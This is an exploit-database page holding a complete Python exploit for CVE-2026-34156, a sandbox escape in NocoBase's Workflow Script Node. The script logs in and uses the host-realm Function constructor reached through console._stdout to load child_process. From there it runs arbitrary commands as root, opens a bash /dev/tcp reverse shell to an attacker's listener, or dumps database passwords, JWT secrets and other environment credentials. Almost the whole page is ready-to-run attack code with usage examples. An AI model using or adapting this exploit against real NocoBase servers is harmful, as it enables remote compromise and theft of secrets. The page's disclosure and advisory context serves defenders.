NocoBase 2.0.27 - VM Sandbox Escape



EKU-ID: 56410 CVE: CVE-2026-34156 OSVDB-ID:
Author: onurcangencbilkent Published: 2026-05-07 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: NocoBase  2.0.27 - VM Sandbox Escape
# Date: 2026-03-26
# Exploit Author: Onurcan Genç
# Vendor Homepage: https://www.nocobase.com/
# Software Link: https://github.com/nocobase/nocobase
# Version: <= 2.0.27 — patched in 2.0.28
# Tested on: Debian GNU/Linux 12 (bookworm) / Docker / Node.js v20.20.1
# CVE: CVE-2026-34156
# Advisory: https://github.com/nocobase/nocobase/security/advisories/GHSA-px3p-vgh9-m57c
# CWE: CWE-913
# CVSS: 9.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
#
# Description:
#   NocoBase's Workflow Script Node executes user-supplied JavaScript inside
#   a Node.js vm sandbox with a custom require allowlist. However, the console
#   object passed into the sandbox exposes host-realm WritableWorkerStdio
#   stream objects (console._stdout / console._stderr). By traversing the
#   prototype chain (.constructor.constructor), an attacker obtains the host
#   realm's Function constructor, accesses the process object, and uses
#   process.mainModule.require to load child_process — bypassing the sandbox
#   and achieving Remote Code Execution as root.
#
# Exploitation chain:
#   console._stdout.constructor.constructor   → host-realm Function
#   Function('return process')()              → Node.js process object
#   process.mainModule.require('child_process') → unrestricted module
#   child_process.execSync('id')              → RCE as root
#
# Usage:
#   python3 exploit.py -t <TARGET> -u <USER> -P <PASS> --cmd "id"
#   python3 exploit.py -t <TARGET> -u <USER> -P <PASS> --dump
#   python3 exploit.py -t <TARGET> -u <USER> -P <PASS> -l <LHOST> -p <LPORT>
#
# Notes:
#   - Requires valid credentials (any user with workflow access)
#   - Vulnerability check runs automatically before exploitation
#   - Default reverse shell uses bash /dev/tcp (Debian-based containers)
#   - Start listener before running: nc -lvnp 4444

import argparse
import json
import requests
import sys
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ─── Colors ───────────────────────────────────────────────────────────────────

class C:
    RED     = "\033[91m"
    GREEN   = "\033[92m"
    YELLOW  = "\033[93m"
    BLUE    = "\033[94m"
    MAGENTA = "\033[95m"
    CYAN    = "\033[96m"
    WHITE   = "\033[97m"
    BOLD    = "\033[1m"
    DIM     = "\033[2m"
    RESET   = "\033[0m"

def info(msg):    print(f"  {C.BLUE}[*]{C.RESET} {msg}")
def good(msg):    print(f"  {C.GREEN}[+]{C.RESET} {msg}")
def warn(msg):    print(f"  {C.YELLOW}[!]{C.RESET} {msg}")
def fail(msg):    print(f"  {C.RED}[-]{C.RESET} {msg}")
def result(msg):  print(f"  {C.CYAN}[→]{C.RESET} {msg}")

BANNER = f"""
{C.RED}{C.BOLD}╔══════════════════════════════════════════════════════════════════╗
║  NocoBase Workflow Script Node — VM Sandbox Escape to RCE      ║
║  CVE: [CVE-2026-34156]  |  CVSS: 9.9 Critical                        ║
║  Author: Onurcan Genç                                          ║
╚══════════════════════════════════════════════════════════════════╝{C.RESET}
"""

ESCAPE_CHAIN = (
    "const Fn=console._stdout.constructor.constructor;"
    "const proc=Fn('return process')();"
    "const cp=proc.mainModule.require('child_process');"
)


# ─── Core Functions ───────────────────────────────────────────────────────────

def authenticate(target: str, username: str, password: str, verify_ssl: bool = False) -> str:
    url = f"{target.rstrip('/')}/api/auth:signIn"
    body = {"account": username, "password": password}

    print()
    info(f"Authenticating as {C.BOLD}{username}{C.RESET}...")

    try:
        resp = requests.post(url, headers={"Content-Type": "application/json"},
                             json=body, timeout=10, verify=verify_ssl)
        data = resp.json()
    except requests.exceptions.ConnectionError:
        fail(f"Connection failed: cannot reach {C.YELLOW}{url}{C.RESET}")
        sys.exit(1)
    except json.JSONDecodeError:
        fail(f"Invalid response from server")
        sys.exit(1)

    if "errors" in data:
        msg = data["errors"][0].get("message", "Unknown error")
        fail(f"Authentication failed: {C.RED}{msg}{C.RESET}")
        sys.exit(1)

    token = data.get("data", {}).get("token")
    if not token:
        fail("No token in response")
        sys.exit(1)

    nickname = data.get("data", {}).get("user", {}).get("nickname", "unknown")
    user_id = data.get("data", {}).get("user", {}).get("id", "?")
    good(f"Authenticated! User: {C.GREEN}{C.BOLD}{nickname}{C.RESET} (ID: {user_id})")
    good(f"Token: {C.DIM}{token[:25]}...{token[-10:]}{C.RESET}")
    return token


def send_payload(target: str, token: str, payload: str, verify_ssl: bool = False) -> dict:
    url = f"{target.rstrip('/')}/api/flow_nodes:test"
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    body = {
        "type": "script",
        "config": {"content": payload, "timeout": 5000, "arguments": []}
    }

    try:
        resp = requests.post(url, headers=headers, json=body, timeout=10, verify=verify_ssl)
        return resp.json()
    except requests.exceptions.Timeout:
        return {"data": {"status": 1, "result": "timeout (expected for reverse shell)"}}
    except requests.exceptions.ConnectionError as e:
        return {"error": f"Connection failed: {e}"}
    except json.JSONDecodeError:
        return {"error": "Invalid JSON response", "raw": resp.text[:500]}


def verify_vulnerability(target: str, token: str) -> bool:
    print()
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")
    info(f"{C.BOLD}Phase 1: Vulnerability Check{C.RESET}")
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")

    check_payload = (
        "try {"
        "  const name = console._stdout.constructor.name;"
        "  const fnType = typeof console._stdout.constructor.constructor;"
        "  return JSON.stringify({stream: name, fnConstructor: fnType});"
        "} catch(e) { return 'ERR: ' + e.message; }"
    )
    result_data = send_payload(target, token, check_payload)

    if "error" in result_data:
        fail(f"Connection error: {result_data['error']}")
        return False

    data = result_data.get("data", {})

    if data.get("status") != 1:
        if "INVALID_TOKEN" in str(data) or "EMPTY_TOKEN" in str(data):
            fail("Authentication token is invalid or expired")
        else:
            fail(f"Unexpected response: {data}")
        return False

    try:
        check = json.loads(data.get("result", "{}"))
        stream = check.get("stream", "")
        fn_type = check.get("fnConstructor", "")

        if stream == "WritableWorkerStdio" and fn_type == "function":
            good(f"Host-realm stream object: {C.GREEN}{C.BOLD}{stream}{C.RESET}")
            good(f"Function constructor:     {C.GREEN}{C.BOLD}accessible{C.RESET}")
            print()
            good(f"{C.GREEN}{C.BOLD}TARGET IS VULNERABLE!{C.RESET}")
            return True
        else:
            fail(f"Unexpected sandbox state: stream={stream}, fn={fn_type}")
            return False
    except (json.JSONDecodeError, TypeError):
        res = data.get("result", "")
        fail(f"Check failed: {res}")
        return False


# ─── Exploit Modes ────────────────────────────────────────────────────────────

def exploit_cmd(target: str, token: str, cmd: str):
    print()
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")
    info(f"{C.BOLD}Phase 2: Command Execution{C.RESET}")
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")

    info(f"Executing: {C.YELLOW}{cmd}{C.RESET}")

    safe_cmd = cmd.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    payload = f'{ESCAPE_CHAIN}return cp.execSync("{safe_cmd}").toString().trim();'
    resp = send_payload(target, token, payload)

    data = resp.get("data", {})
    if data.get("status") == 1:
        output = data.get("result", "")
        print()
        good(f"Output:")
        print(f"  {C.CYAN}{'─' * 55}{C.RESET}")
        for line in output.split("\n"):
            print(f"  {C.WHITE}{line}{C.RESET}")
        print(f"  {C.CYAN}{'─' * 55}{C.RESET}")
    else:
        fail(f"Execution failed: {data}")


def exploit_revshell(target: str, token: str, lhost: str, lport: int):
    print()
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")
    info(f"{C.BOLD}Phase 2: Reverse Shell{C.RESET}")
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")

    info(f"Target:   {C.YELLOW}{target}{C.RESET}")
    info(f"Callback: {C.GREEN}{C.BOLD}{lhost}:{lport}{C.RESET}")
    warn(f"Ensure listener is running: {C.BOLD}nc -lvnp {lport}{C.RESET}")
    print()

    shell_cmd = f'bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"'
    payload = f"{ESCAPE_CHAIN}cp.exec('{shell_cmd}');return 'shell spawned';"
    resp = send_payload(target, token, payload)

    data = resp.get("data", {})
    res = data.get("result", "")

    if "shell spawned" in str(res) or "timeout" in str(res):
        good(f"{C.GREEN}{C.BOLD}Payload delivered! Check your listener.{C.RESET}")
    else:
        fail(f"Unexpected response: {data}")


def exploit_dump(target: str, token: str):
    print()
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")
    info(f"{C.BOLD}Phase 2: System & Credential Dump{C.RESET}")
    print(f"  {C.MAGENTA}{'─' * 55}{C.RESET}")

    # System info via shell commands
    commands = [
        ("User",        "id"),
        ("Hostname",    "hostname"),
        ("OS",          "cat /etc/os-release | grep PRETTY_NAME | cut -d= -f2"),
        ("Kernel",      "uname -r"),
        ("Node.js",     "node --version"),
        ("Working Dir", "pwd"),
    ]

    print()
    info(f"{C.BOLD}System Information{C.RESET}")
    print(f"  {C.CYAN}{'─' * 55}{C.RESET}")

    for label, cmd in commands:
        safe_cmd = cmd.replace('"', '\\"')
        payload = f'{ESCAPE_CHAIN}return cp.execSync("{safe_cmd}").toString().trim();'
        resp = send_payload(target, token, payload)
        data = resp.get("data", {})
        if data.get("status") == 1:
            out = data.get("result", "N/A").replace('"', '')
            print(f"  {C.WHITE}{label:.<22}{C.RESET} {C.GREEN}{out}{C.RESET}")

    print(f"  {C.CYAN}{'─' * 55}{C.RESET}")

    # Credentials via JavaScript
    print()
    info(f"{C.BOLD}Environment Credentials{C.RESET}")
    print(f"  {C.CYAN}{'─' * 55}{C.RESET}")

    secrets_payload = (
        f"{ESCAPE_CHAIN}"
        "const env = proc.env;"
        "const keys = ['DB_HOST','DB_PORT','DB_DATABASE','DB_USER','DB_PASSWORD',"
        "'DB_DIALECT','INIT_ROOT_USERNAME','INIT_ROOT_PASSWORD','INIT_ROOT_NICKNAME',"
        "'INIT_ROOT_EMAIL','APP_KEY','API_KEY','JWT_SECRET','SECRET_KEY'];"
        "const out = {}; keys.forEach(k => { if(env[k]) out[k] = env[k]; });"
        "return JSON.stringify(out);"
    )
    resp = send_payload(target, token, secrets_payload)
    data = resp.get("data", {})

    if data.get("status") == 1:
        try:
            creds = json.loads(data.get("result", "{}"))
            for k, v in creds.items():
                color = C.RED if "PASS" in k or "SECRET" in k or "KEY" in k else C.YELLOW
                print(f"  {C.WHITE}{k:.<30}{C.RESET} {color}{C.BOLD}{v}{C.RESET}")
        except json.JSONDecodeError:
            result(f"Raw: {data.get('result')}")

    print(f"  {C.CYAN}{'─' * 55}{C.RESET}")

    # All env vars with sensitive patterns
    print()
    info(f"{C.BOLD}Additional Secrets (pattern match){C.RESET}")
    print(f"  {C.CYAN}{'─' * 55}{C.RESET}")

    extra_payload = (
        f"{ESCAPE_CHAIN}"
        "const env = proc.env;"
        "const out = {};"
        "for (const k of Object.keys(env)) {"
        "  if (/secret|key|token|pass|auth|jwt|api_key|private/i.test(k) && "
        "      !k.startsWith('npm_')) out[k] = env[k];"
        "}"
        "return JSON.stringify(out);"
    )
    resp = send_payload(target, token, extra_payload)
    data = resp.get("data", {})

    if data.get("status") == 1:
        try:
            extras = json.loads(data.get("result", "{}"))
            if extras:
                for k, v in extras.items():
                    print(f"  {C.WHITE}{k:.<30}{C.RESET} {C.RED}{C.BOLD}{v}{C.RESET}")
            else:
                info("No additional secrets found")
        except json.JSONDecodeError:
            pass

    print(f"  {C.CYAN}{'─' * 55}{C.RESET}")


# ─── Main ─────────────────────────────────────────────────────────────────────

def main():
    print(BANNER)

    parser = argparse.ArgumentParser(
        description="NocoBase Workflow Script Node — VM Sandbox Escape to RCE",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=f"""
{C.BOLD}Examples:{C.RESET}
  {C.CYAN}Command:{C.RESET}       %(prog)s -t http://target:13000 -u nocobase -P admin123 --cmd "id"
  {C.CYAN}Dump:{C.RESET}          %(prog)s -t http://target:13000 -u nocobase -P admin123 --dump
  {C.CYAN}Reverse Shell:{C.RESET} %(prog)s -t http://target:13000 -u nocobase -P admin123 -l 10.10.14.5 -p 4444
        """
    )
    parser.add_argument("-t", "--target", required=True,
                        help="Target NocoBase URL (e.g., http://target:13000)")
    parser.add_argument("-u", "--username", required=True,
                        help="NocoBase username")
    parser.add_argument("-P", "--password", required=True,
                        help="NocoBase password")
    parser.add_argument("-l", "--lhost", default=None,
                        help="Listener IP for reverse shell")
    parser.add_argument("-p", "--lport", type=int, default=4444,
                        help="Listener port (default: 4444)")
    parser.add_argument("--cmd", default=None,
                        help="Execute a single command")
    parser.add_argument("--dump", action="store_true",
                        help="Dump system info and credentials")
    parser.add_argument("--no-verify", action="store_true",
                        help="Skip vulnerability verification")

    args = parser.parse_args()

    if not args.cmd and not args.lhost and not args.dump:
        fail(f"Specify {C.BOLD}--cmd{C.RESET} (command), {C.BOLD}--dump{C.RESET} (info), or {C.BOLD}-l LHOST{C.RESET} (revshell)")
        sys.exit(1)

    # Phase 0: Authenticate
    token = authenticate(args.target, args.username, args.password)

    # Phase 1: Vulnerability check (always runs unless --no-verify)
    if not args.no_verify:
        if not verify_vulnerability(args.target, token):
            fail(f"{C.RED}{C.BOLD}TARGET IS NOT VULNERABLE.{C.RESET} Exiting.")
            sys.exit(1)

    # Phase 2: Exploit
    if args.dump:
        exploit_dump(args.target, token)
    elif args.cmd:
        exploit_cmd(args.target, token, args.cmd)
    else:
        exploit_revshell(args.target, token, args.lhost, args.lport)

    print()
    print(f"  {C.GREEN}{C.BOLD}Done.{C.RESET}")
    print()


if __name__ == "__main__":
    main()